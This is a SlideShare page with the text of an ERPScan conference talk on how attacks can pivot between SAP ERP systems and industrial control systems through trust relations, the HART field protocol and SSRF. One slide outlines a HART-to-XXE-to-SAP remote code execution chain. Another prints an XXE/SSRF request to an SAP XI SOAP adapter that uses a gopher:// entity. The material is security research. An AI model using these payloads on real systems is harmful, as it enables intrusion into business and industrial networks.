SlideShare a Scribd company logo

Business breakdown vulnerabilities in ERP via ICS and ICS via ERP

ERPScan, profile picture
ERPScan

This document discusses vulnerabilities in connecting ERP and ICS systems. It notes that while ERP, ICS, and other business systems need to be connected to share information, these connections can be exploited by attackers to infiltrate corporate networks. The document outlines several ways that vulnerabilities in ERP systems, misconfigurations, unnecessary privileges, and system interconnectivity can be leveraged to access sensitive business data or disrupt operations. It emphasizes that securing these connections and monitoring for security issues is critical for business security and continuity.

Software
1 of 26
Downloaded 23 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Invest  in  security   to  secure  investments   Business  Breakdown   Vulnerabili1es  in  ERP  via  ICS  and   ICS  via  ERP   Alexander  Polyakov   CTO  ERPScan,  President  EAS-­‐SEC  
About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu1on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presenta=ons  key  security  conferences  worldwide   •  25  Awards  and  nomina=ons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
How  do  they  look  like   3   3   Portal   HR   BW   ECC   Billing   Suppliers   Customers   Banks   Insurance   Partners   Branches   BI   IS   CRM   PAS/   EAS   MES   SRM   SCADA /DCS   OPC   PLC’s   Field  Devices   SolMan   SAP  AS   XI/PI  
How  popular  they  are   SAP   •  More  than  246000  customers  worldwide     •  86%  of  Forbes  500   Oracle   •  100%  of  Fortune  100   Microso^   •  More   than   300,000   businesses   worldwide   choose   Microso^   Dynamics  ERP  and  CRM  so^ware     4  
•  Espionage   –  The^  of  Financial  Informa1on   –  Trade  Secret  the^   –  Supplier  and  Customer  list  the^   –  HR  data  the^     –  Other  Corporate  Data  the^   •  Sabotage   –  Denial  of  service   –  Modifica1on  of  financial  statements   –  Access  to  technology  network  (SCADA/ICS)  by  trust  rela=ons   •  Fraud   –  False  transac1ons   –  Modifica1on  of  master  data   5   What  can  happen  
How  do  they  look  like   6   6   Portal   HR   BW   ECC   Billing   Suppliers   Customers   Banks   Insurance   Partners   Branches   BI   IS   CRM   PAS/   EAS   MES   SRM   SCADA /DCS   OPC   PLC’s   Field  Devices   SolMan   SAP  AS   XI/PI  
How  easy  is  that   Systems  should  be  connected  with  each  other   •  Directly     –  ERP  collects  informa1on  from  PAS/EAS   •  Indirectly     –  ERP  shares  database  with  MES/EAS   –  ERP  is  connected  with  ICS/SCADA  via  XI  or  PI  system   •  In  one  network       –  Exploit  typical  vulnerabili1es  of  password  sniffing   •  In  different  networks     –  Exploit  trust  rela1ons   7  
Internet  to  Internal   •  Via  Internet  resources  (SAP  Portal/CRM/SRP)   •  Via  Partners  (SAP  XI)   •  Via  SAP  Router   •  Via  Worksta1ons  (Trojans)   •  Via  Unnecessary  SAP  Services  in  Internet         8  
How  to  break  SAP?   At  least:   •  Unnecessary  privileges   •  Misconfigura1ons   •  Vulnerabili1es   •  Custom    code  issues   9  
Unnecessary  privileges   •  One  example:  Create  vendor  +  Approve  Payment  order     •  Usually  ((~100  Roles  X  10  ac1ons)^2)/2=500k   •  500k  poten1al  conflicts  for  each  user!   •  A  lot  of  work     •  Usually  takes  two  years  to  decrease  conflicts  from  millions  to   hundreds.     10  
Misconfigura=ons   ~1500  profile  parameters   ~1200  Web-­‐applica1ons   ~700  webservices   ~100  specific  commands  for  mmc   ~100  specific  checks    for  each  of  the  50  modules         11  
1.  Lack  of  patch  management     2.  Default  passwords     3.  Unnecessary  enabled  func1onality   4.  Remotely  enabled  administra1ve  services     5.  Insecure  configura1on     6.  Unencrypted  communica1ons   7.  Internal  access  control  and  SoD     8.  Insecure  trust  rela1ons     9.  Monitoring  of  security  events   12   Misconfigura=ons  
13   Only  one  vulnerability  is  enough    to  get  access  to  ALL  business-­‐cri1cal  DATA   0   100   200   300   400   500   600   700   800   900   2001   2002   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   2013   2014   By  July  2014  –  3000+  notes   Vulnerabili=es  
From  ERP  to  ICS   Some  systems  should  be  connected  at  least  on  the  network  layer.   •  SAP  RFC  links   •  Database  links   •  Same  Domain     •  Similar  passwords   !TRUST  CONNECTIONS  –  main  issue     14  
From  ICS  to  ERP         PART  2    (From  ICS  to  ERP)   15  
From  ICS/Devices  to  ERP   •  USB  (like  Stuxnet)   •  Wireless  devices  (Usually  bad  encryp1on)   •  Wired  devices  (need  physical  access)   •  Aoack  on  Wire  (low  level  field  protocols)   –  RS485   –  Profibus  PA   –  FF  H1   –  HART           16  
Big  Big  Company   17  
How  do  they  look  like   18   18   Portal   HR   BW   ECC   Billing   Suppliers   Customers   Banks   Insurance   Partners   Branches   BI   IS   CRM   PAS/   EAS   MES   SRM   SCADA /DCS   OPC   PLC’s   Field  Devices   SolMan   SAP  AS   XI/PI  
From  ICS  to  ERP   19   Corporate  network   ERP   MES   PLC2,3…  PLC1   PLC7,8…   Field  devices   Routers/Firewalls   OPC   SCADA/ DCS   HMI   Industrial  bus  
From  ICS  to  ERP   20   •  HART  (current  loop,  4-­‐20  mA)   •  Mostly  used  on  power  plants,  chemical  factories,  oil  &  gas   industry   •  Every  field  device  (in  general,  every  device)  in  PAS  industrial   facility  hierarchy  has  a  unique  ID   •  For  HART  devices,  HART  long  tag  is  used  as  an  universal  ID   •  HART  tag  (8  bytes  packed  ASCII)  and  HART  long  tag  (32  bytes   ASCII)  are  used  as  applica1on  layer  address  
Vulnerabili=es   21   DEMO  Infrastructure   Corporate  network   ERP   Transmioer   Firewall  (only  HTTP  traffic  allowed)   FieldCare   (PAS)   Current  loop   (HART  Analog   4-­‐20mA  line)   Ethernet   HART  modem  
Vulnerabili=es   22   ICSCorsair  board  
Aack  Scheme   23   Current  loop   HART  gateway/master   XML  data   HART  Command  22   Long  tag  change  packet   A' xmlns='x- schema:http://q45.ru  Aoacker   HART  transmioer   XMLI   Evil  web  server   Request  for  remote  XSD  schema   Reply  (XSD  with  SSRF)  SSRF   1   2   3   4   5   Internet   PAS  (FieldCare)   6   SAP  remote  command  execu1on  exploit  query   RCE   J   ERP  
From  ERP  to  ICS   •  SSRF  hop://cwe.mitre.org/data/defini1ons/918.html   •  Second  place  in  Top  10  web  applica1on  techniques  2012   •  Allows  to  bypass  firewall  restric1ons  and  directly  connect  to   protected  systems  via  connected  systems   24  
SSRF   25   Server  B  (ERP,   HR,  BW  etc.)   Server  A  (Portal  or  XI)     192.168.0.1   172.16.0.1   POST  /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.DilbertMSG? format=post  HTTP/1.1   Host:  192.168.0.1:8000     <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher:// 172.16.0.1:3300/AAAAAAAAA"  >]>    <foo>&date;</foo>   AAAAAAAAAAAAA   Port   3300   telnet  172.16.0.1  3300  
Conclusion   •  Cri1cal  networks  are  complex   •  System  is  as  secure  as  its  most  insecure  component   •  Holis1c  approach   •  Check  eas-­‐sec.org     26  

More Related Content

PDF
SAP SDM Hacking
ERPScan
 
PDF
If I want a perfect cyberweapon, I'll target ERP - second edition
ERPScan
 
PDF
Assessing and Securing SAP Solutions
ERPScan
 
PDF
Attacking SAP Mobile
ERPScan
 
PDF
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
ERPScan
 
PDF
If I want a perfect cyberweapon, I'll target ERP
ERPScan
 
PDF
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
ERPScan
 
PDF
SAP security landscape. How to protect(hack) your(their) big business
ERPScan
 
SAP SDM Hacking
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
ERPScan
 
Assessing and Securing SAP Solutions
ERPScan
 
Attacking SAP Mobile
ERPScan
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP
ERPScan
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
ERPScan
 
SAP security landscape. How to protect(hack) your(their) big business
ERPScan
 

What's hot (20)

PDF
Oracle PeopleSoft applications are under attacks (Hack in Paris)
ERPScan
 
PDF
Assess and monitor SAP security
ERPScan
 
PDF
SAP (in)security: New and best
ERPScan
 
PDF
Practical SAP pentesting (B-Sides San Paulo)
ERPScan
 
PDF
Practical SAP pentesting workshop (NullCon Goa)
ERPScan
 
PDF
Securing SAP in 5 steps
ERPScan
 
PDF
Oracle PeopleSoft applications are under attack (HITB AMS)
ERPScan
 
PDF
Forgotten world - Corporate Business Application Systems
ERPScan
 
PDF
All your SAP passwords belong to us
ERPScan
 
PDF
The latest changes to SAP cybersecurity landscape
ERPScan
 
PDF
Implementing SAP security in 5 steps
ERPScan
 
PDF
Attacking SAP users with sapsploit
ERPScan
 
PPT
Sap security – thinking with a hacker’s hat
n|u - The Open Security Community
 
PDF
5 real ways to destroy business by breaking SAP applications
ERPScan
 
PDF
SAP security in figures
ERPScan
 
PDF
SAP Business Objects Attacks
Onapsis Inc.
 
PDF
Cyber-attacks to SAP Systems
Onapsis Inc.
 
PDF
Sap Security Hacks and Mitigation - Timeless Attacks
Ertunga Arsal
 
PDF
Sap penetration testing_defense_in_depth
Igor Igoroshka
 
PDF
Penetration Testing SAP Systems
Onapsis Inc.
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
ERPScan
 
Assess and monitor SAP security
ERPScan
 
SAP (in)security: New and best
ERPScan
 
Practical SAP pentesting (B-Sides San Paulo)
ERPScan
 
Practical SAP pentesting workshop (NullCon Goa)
ERPScan
 
Securing SAP in 5 steps
ERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
ERPScan
 
Forgotten world - Corporate Business Application Systems
ERPScan
 
All your SAP passwords belong to us
ERPScan
 
The latest changes to SAP cybersecurity landscape
ERPScan
 
Implementing SAP security in 5 steps
ERPScan
 
Attacking SAP users with sapsploit
ERPScan
 
Sap security – thinking with a hacker’s hat
n|u - The Open Security Community
 
5 real ways to destroy business by breaking SAP applications
ERPScan
 
SAP security in figures
ERPScan
 
SAP Business Objects Attacks
Onapsis Inc.
 
Cyber-attacks to SAP Systems
Onapsis Inc.
 
Sap Security Hacks and Mitigation - Timeless Attacks
Ertunga Arsal
 
Sap penetration testing_defense_in_depth
Igor Igoroshka
 
Penetration Testing SAP Systems
Onapsis Inc.
 
Ad

Viewers also liked (7)

PDF
Top 10 most interesting vulnerabilities and attacks in SAP
ERPScan
 
PDF
SAP portal: breaking and forensicating
ERPScan
 
PDF
Breaking SAP portal (HashDays)
ERPScan
 
PDF
SAP security made easy
ERPScan
 
PDF
Practical pentesting of ERPs and business applications
ERPScan
 
PDF
What CISOs should know about SAP security
ERPScan
 
PDF
EAS-SEC: Framework for securing business applications
ERPScan
 
Top 10 most interesting vulnerabilities and attacks in SAP
ERPScan
 
SAP portal: breaking and forensicating
ERPScan
 
Breaking SAP portal (HashDays)
ERPScan
 
SAP security made easy
ERPScan
 
Practical pentesting of ERPs and business applications
ERPScan
 
What CISOs should know about SAP security
ERPScan
 
EAS-SEC: Framework for securing business applications
ERPScan
 
Ad

Similar to Business breakdown vulnerabilities in ERP via ICS and ICS via ERP (20)

PDF
EAS-SEC Project
ERPScan
 
PDF
HART as an Attack Vector
Digital Bond
 
PDF
Get Mainframe Visibility to Enhance SIEM Efforts in Splunk
Precisely
 
PPTX
Sap
sivachandra mandalapu
 
PDF
Big Data Analytics for Real-time Operational Intelligence with Your z/OS Data
Precisely
 
PDF
5.2 QRadar_Architecture_-_General123.pdf
MuhammadAmir785555
 
PDF
Stop Wasting Energy on M2M
Eurotech
 
PPTX
Systems on the edge - your stepping stones into Oracle Public PaaS Cloud - AM...
Lucas Jellema
 
PDF
Sym 2015 product overview apr2015
Todd Masters
 
PDF
Splunk app for stream
csching
 
PDF
8 Ocak 2015 SOME Etkinligi - A10 Networks - Accelerating and Securing Applica...
BGA Cyber Security
 
PDF
ERP Security. Myths, Problems, Solutions
ERPScan
 
PDF
IoT and the Oil & Gas industry at M2M Oil & Gas 2014 in London
Eurotech
 
PDF
Apache Kafka® in Industrial Environments
confluent
 
PDF
A modern approach to safeguarding your ICS and SCADA systems
Alane Moran
 
PDF
Monitoring ICS Communications
Digital Bond
 
PDF
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
arnaudsoullie
 
PPTX
A10 presentation for LB GLB for ADC solutions
eyala75
 
PPS
Active network
Michel Burger
 
PDF
Getting Started with Splunk Enterprise
Splunk
 
EAS-SEC Project
ERPScan
 
HART as an Attack Vector
Digital Bond
 
Get Mainframe Visibility to Enhance SIEM Efforts in Splunk
Precisely
 
Sap
sivachandra mandalapu
 
Big Data Analytics for Real-time Operational Intelligence with Your z/OS Data
Precisely
 
5.2 QRadar_Architecture_-_General123.pdf
MuhammadAmir785555
 
Stop Wasting Energy on M2M
Eurotech
 
Systems on the edge - your stepping stones into Oracle Public PaaS Cloud - AM...
Lucas Jellema
 
Sym 2015 product overview apr2015
Todd Masters
 
Splunk app for stream
csching
 
8 Ocak 2015 SOME Etkinligi - A10 Networks - Accelerating and Securing Applica...
BGA Cyber Security
 
ERP Security. Myths, Problems, Solutions
ERPScan
 
IoT and the Oil & Gas industry at M2M Oil & Gas 2014 in London
Eurotech
 
Apache Kafka® in Industrial Environments
confluent
 
A modern approach to safeguarding your ICS and SCADA systems
Alane Moran
 
Monitoring ICS Communications
Digital Bond
 
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
arnaudsoullie
 
A10 presentation for LB GLB for ADC solutions
eyala75
 
Active network
Michel Burger
 
Getting Started with Splunk Enterprise
Splunk
 

Recently uploaded (20)

PDF
2025 Textile ERP Trends: SAP, Odoo & Oracle
Aetos Technologies
 
PPTX
CHAPTER 2 - PM Management and IT Context
KevinPutra14
 
PPTX
L1 - Introduction to python Backend.pptx
MoizAhmed480282
 
PPTX
history of c programming in notes for students .pptx
Vijayakumari829030
 
PDF
PTS Company Brochure 2025 (1).pdf.......
pts464036
 
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
itskinga12
 
PPTX
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
hci7se
 
PDF
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
William Chong
 
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 41
ghrom2211g
 
PDF
wealthsignaloriginal-com-DS-text-... (1).pdf
skmiani786
 
PPTX
ai tools demonstartion for schools and inter college
harshavardhanreddyka11
 
PDF
Odoo Companies in India – Driving Business Transformation.pdf
azhuhardeen1968
 
PDF
Design an Analysis of Algorithms II-SECS-1021-03
DilanEscobar1
 
PDF
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
deepakkhaitan3
 
PDF
Digital Strategies for Manufacturing Companies
Virendra Rai, PMP
 
PDF
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
TechBuilder
 
PPTX
Operating system designcfffgfgggggggvggggggggg
rmskumara09
 
PDF
System and Network Administration Chapter 2
jaramharo
 
PDF
How to Choose the Right IT Partner for Your Business in Malaysia
Asian Business Services & Technologies
 
PPTX
VVF-Customer-Presentation2025-Ver1.9.pptx
blackmambaettijean
 
2025 Textile ERP Trends: SAP, Odoo & Oracle
Aetos Technologies
 
CHAPTER 2 - PM Management and IT Context
KevinPutra14
 
L1 - Introduction to python Backend.pptx
MoizAhmed480282
 
history of c programming in notes for students .pptx
Vijayakumari829030
 
PTS Company Brochure 2025 (1).pdf.......
pts464036
 
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
itskinga12
 
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
hci7se
 
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
William Chong
 
Internet Downloader Manager (IDM) Crack 6.42 Build 41
ghrom2211g
 
wealthsignaloriginal-com-DS-text-... (1).pdf
skmiani786
 
ai tools demonstartion for schools and inter college
harshavardhanreddyka11
 
Odoo Companies in India – Driving Business Transformation.pdf
azhuhardeen1968
 
Design an Analysis of Algorithms II-SECS-1021-03
DilanEscobar1
 
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
deepakkhaitan3
 
Digital Strategies for Manufacturing Companies
Virendra Rai, PMP
 
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
TechBuilder
 
Operating system designcfffgfgggggggvggggggggg
rmskumara09
 
System and Network Administration Chapter 2
jaramharo
 
How to Choose the Right IT Partner for Your Business in Malaysia
Asian Business Services & Technologies
 
VVF-Customer-Presentation2025-Ver1.9.pptx
blackmambaettijean
 

Business breakdown vulnerabilities in ERP via ICS and ICS via ERP

  • 1. Invest  in  security   to  secure  investments   Business  Breakdown   Vulnerabili1es  in  ERP  via  ICS  and   ICS  via  ERP   Alexander  Polyakov   CTO  ERPScan,  President  EAS-­‐SEC  
  • 2. About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu1on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presenta=ons  key  security  conferences  worldwide   •  25  Awards  and  nomina=ons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
  • 3. How  do  they  look  like   3   3   Portal   HR   BW   ECC   Billing   Suppliers   Customers   Banks   Insurance   Partners   Branches   BI   IS   CRM   PAS/   EAS   MES   SRM   SCADA /DCS   OPC   PLC’s   Field  Devices   SolMan   SAP  AS   XI/PI  
  • 4. How  popular  they  are   SAP   •  More  than  246000  customers  worldwide     •  86%  of  Forbes  500   Oracle   •  100%  of  Fortune  100   Microso^   •  More   than   300,000   businesses   worldwide   choose   Microso^   Dynamics  ERP  and  CRM  so^ware     4  
  • 5. •  Espionage   –  The^  of  Financial  Informa1on   –  Trade  Secret  the^   –  Supplier  and  Customer  list  the^   –  HR  data  the^     –  Other  Corporate  Data  the^   •  Sabotage   –  Denial  of  service   –  Modifica1on  of  financial  statements   –  Access  to  technology  network  (SCADA/ICS)  by  trust  rela=ons   •  Fraud   –  False  transac1ons   –  Modifica1on  of  master  data   5   What  can  happen  
  • 6. How  do  they  look  like   6   6   Portal   HR   BW   ECC   Billing   Suppliers   Customers   Banks   Insurance   Partners   Branches   BI   IS   CRM   PAS/   EAS   MES   SRM   SCADA /DCS   OPC   PLC’s   Field  Devices   SolMan   SAP  AS   XI/PI  
  • 7. How  easy  is  that   Systems  should  be  connected  with  each  other   •  Directly     –  ERP  collects  informa1on  from  PAS/EAS   •  Indirectly     –  ERP  shares  database  with  MES/EAS   –  ERP  is  connected  with  ICS/SCADA  via  XI  or  PI  system   •  In  one  network       –  Exploit  typical  vulnerabili1es  of  password  sniffing   •  In  different  networks     –  Exploit  trust  rela1ons   7  
  • 8. Internet  to  Internal   •  Via  Internet  resources  (SAP  Portal/CRM/SRP)   •  Via  Partners  (SAP  XI)   •  Via  SAP  Router   •  Via  Worksta1ons  (Trojans)   •  Via  Unnecessary  SAP  Services  in  Internet         8  
  • 9. How  to  break  SAP?   At  least:   •  Unnecessary  privileges   •  Misconfigura1ons   •  Vulnerabili1es   •  Custom    code  issues   9  
  • 10. Unnecessary  privileges   •  One  example:  Create  vendor  +  Approve  Payment  order     •  Usually  ((~100  Roles  X  10  ac1ons)^2)/2=500k   •  500k  poten1al  conflicts  for  each  user!   •  A  lot  of  work     •  Usually  takes  two  years  to  decrease  conflicts  from  millions  to   hundreds.     10  
  • 11. Misconfigura=ons   ~1500  profile  parameters   ~1200  Web-­‐applica1ons   ~700  webservices   ~100  specific  commands  for  mmc   ~100  specific  checks    for  each  of  the  50  modules         11  
  • 12. 1.  Lack  of  patch  management     2.  Default  passwords     3.  Unnecessary  enabled  func1onality   4.  Remotely  enabled  administra1ve  services     5.  Insecure  configura1on     6.  Unencrypted  communica1ons   7.  Internal  access  control  and  SoD     8.  Insecure  trust  rela1ons     9.  Monitoring  of  security  events   12   Misconfigura=ons  
  • 13. 13   Only  one  vulnerability  is  enough    to  get  access  to  ALL  business-­‐cri1cal  DATA   0   100   200   300   400   500   600   700   800   900   2001   2002   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   2013   2014   By  July  2014  –  3000+  notes   Vulnerabili=es  
  • 14. From  ERP  to  ICS   Some  systems  should  be  connected  at  least  on  the  network  layer.   •  SAP  RFC  links   •  Database  links   •  Same  Domain     •  Similar  passwords   !TRUST  CONNECTIONS  –  main  issue     14  
  • 15. From  ICS  to  ERP         PART  2    (From  ICS  to  ERP)   15  
  • 16. From  ICS/Devices  to  ERP   •  USB  (like  Stuxnet)   •  Wireless  devices  (Usually  bad  encryp1on)   •  Wired  devices  (need  physical  access)   •  Aoack  on  Wire  (low  level  field  protocols)   –  RS485   –  Profibus  PA   –  FF  H1   –  HART           16  
  • 18. How  do  they  look  like   18   18   Portal   HR   BW   ECC   Billing   Suppliers   Customers   Banks   Insurance   Partners   Branches   BI   IS   CRM   PAS/   EAS   MES   SRM   SCADA /DCS   OPC   PLC’s   Field  Devices   SolMan   SAP  AS   XI/PI  
  • 19. From  ICS  to  ERP   19   Corporate  network   ERP   MES   PLC2,3…  PLC1   PLC7,8…   Field  devices   Routers/Firewalls   OPC   SCADA/ DCS   HMI   Industrial  bus  
  • 20. From  ICS  to  ERP   20   •  HART  (current  loop,  4-­‐20  mA)   •  Mostly  used  on  power  plants,  chemical  factories,  oil  &  gas   industry   •  Every  field  device  (in  general,  every  device)  in  PAS  industrial   facility  hierarchy  has  a  unique  ID   •  For  HART  devices,  HART  long  tag  is  used  as  an  universal  ID   •  HART  tag  (8  bytes  packed  ASCII)  and  HART  long  tag  (32  bytes   ASCII)  are  used  as  applica1on  layer  address  
  • 21. Vulnerabili=es   21   DEMO  Infrastructure   Corporate  network   ERP   Transmioer   Firewall  (only  HTTP  traffic  allowed)   FieldCare   (PAS)   Current  loop   (HART  Analog   4-­‐20mA  line)   Ethernet   HART  modem  
  • 23. Aack  Scheme   23   Current  loop   HART  gateway/master   XML  data   HART  Command  22   Long  tag  change  packet   A' xmlns='x- schema:http://q45.ru  Aoacker   HART  transmioer   XMLI   Evil  web  server   Request  for  remote  XSD  schema   Reply  (XSD  with  SSRF)  SSRF   1   2   3   4   5   Internet   PAS  (FieldCare)   6   SAP  remote  command  execu1on  exploit  query   RCE   J   ERP  
  • 24. From  ERP  to  ICS   •  SSRF  hop://cwe.mitre.org/data/defini1ons/918.html   •  Second  place  in  Top  10  web  applica1on  techniques  2012   •  Allows  to  bypass  firewall  restric1ons  and  directly  connect  to   protected  systems  via  connected  systems   24  
  • 25. SSRF   25   Server  B  (ERP,   HR,  BW  etc.)   Server  A  (Portal  or  XI)     192.168.0.1   172.16.0.1   POST  /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.DilbertMSG? format=post  HTTP/1.1   Host:  192.168.0.1:8000     <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher:// 172.16.0.1:3300/AAAAAAAAA"  >]>    <foo>&date;</foo>   AAAAAAAAAAAAA   Port   3300   telnet  172.16.0.1  3300  
  • 26. Conclusion   •  Cri1cal  networks  are  complex   •  System  is  as  secure  as  its  most  insecure  component   •  Holis1c  approach   •  Check  eas-­‐sec.org     26